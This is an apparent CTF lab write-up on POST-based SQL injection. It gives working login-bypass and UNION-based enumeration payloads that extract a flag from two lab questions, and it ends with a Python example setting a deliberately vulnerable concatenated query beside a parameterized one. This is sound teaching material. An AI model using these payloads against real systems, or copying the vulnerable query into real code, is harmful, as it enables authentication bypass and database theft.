SQL injection-POST type

Range address
Principle:
POST injection passes parameters with the POST method: the user submits data that interacts with the database, and useful information can be extracted from the database.

First question:

We first check the source code: it runs the submitted input directly without doing any processing. Therefore, we only need to close the code in front of username and then comment out the code that follows to interact with the data.

I enter this in the account box:

' or 1=1 #

The result is displayed directly.
So, to determine the number of fields, I enter the following in sequence:

'union select 1#

'union select 1,2#

'union select 1,2,3#

Only the third one shows that the login is successful.
So the number of fields is judged to be 3.

Next, we use database() to query the database name, entering the following in turn:

'union select 1,2,database() limit 0,1 #

'union select 1,2,database() limit 9,1 #

error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar

The query finds the database post_error, and I judge that the flag may be in it.

So continue by entering:

'union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

This finds the table flag.

Continue with that table name, entering:

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 1,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 2,1 #

It is found that it has two column names:
flag
id
To find the flag, directly query the flag data by entering:

' union select 1,2,group_concat(flag) from flag#

This gets the flag.

Second question

The method is the same, but its source code is different, so we need to use:

") or 1=1 #

The login is successful, so there is a POST injection vulnerability.
I first determine the number of fields, entering the following in turn:

") union select 1#

")union select 1,2#

") union select 1,2,3#

The number of fields is judged to be three.
Then we use database() to query the database name, entering the following in turn:

")union select 1,2,database() limit 0,1 #

")union select 1,2,database() limit 9,1 #

error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar

The query finds the database post_error, and I judge that the flag may be in it.

So continue by entering:

") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

It is found that it has two column names:
flag
id
To find the flag, directly query the flag data by entering:

") union select 1,2,group_concat(flag) from flag#

So I got the flag for the second question.
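
The inputs in both questions work because the login query is assembled by pasting the POST values into the SQL text. The following is an added example, not the lab's source code (which is not reproduced on this page): it puts that weak construction beside a parameterized one. The table layout, function names and sample credentials are constructed, and it runs on SQLite, so the trailing comment is `-- ` where the page uses MySQL's `#`.

```python
import sqlite3

def make_db():
    """Constructed sample database: one user table behind a login form."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret-constructed')")
    return conn

def login_concatenated(conn, username, password):
    # Weak form: POST values are pasted into the SQL text, so a quote in
    # `username` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, username, password FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL counts as a failed login

def login_parameterized(conn, username, password):
    # Corrected form: the SQL text is fixed and the values are bound as data,
    # so quotes and comment markers in them are compared literally.
    sql = ("SELECT id, username, password FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchone()

# The page's first input, with SQLite's "-- " in place of MySQL's "#".
PAYLOAD = "' or 1=1 -- "

def compare(username, password):
    """Return (concatenated login succeeded, parameterized login succeeded)."""
    conn = make_db()
    try:
        return (login_concatenated(conn, username, password) is not None,
                login_parameterized(conn, username, password) is not None)
    finally:
        conn.close()

if __name__ == "__main__":
    for user, pw in [("admin", "s3cret-constructed"), ("admin", "wrong"),
                     (PAYLOAD, "x")]:
        print(repr(user), compare(user, pw))
```

The parameterized form is unaffected by how the original query wraps the value, so it covers the `'` case of the first question and the `")` case of the second alike.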

Origin blog.csdn.net/weixin_43264067/article/details/106073519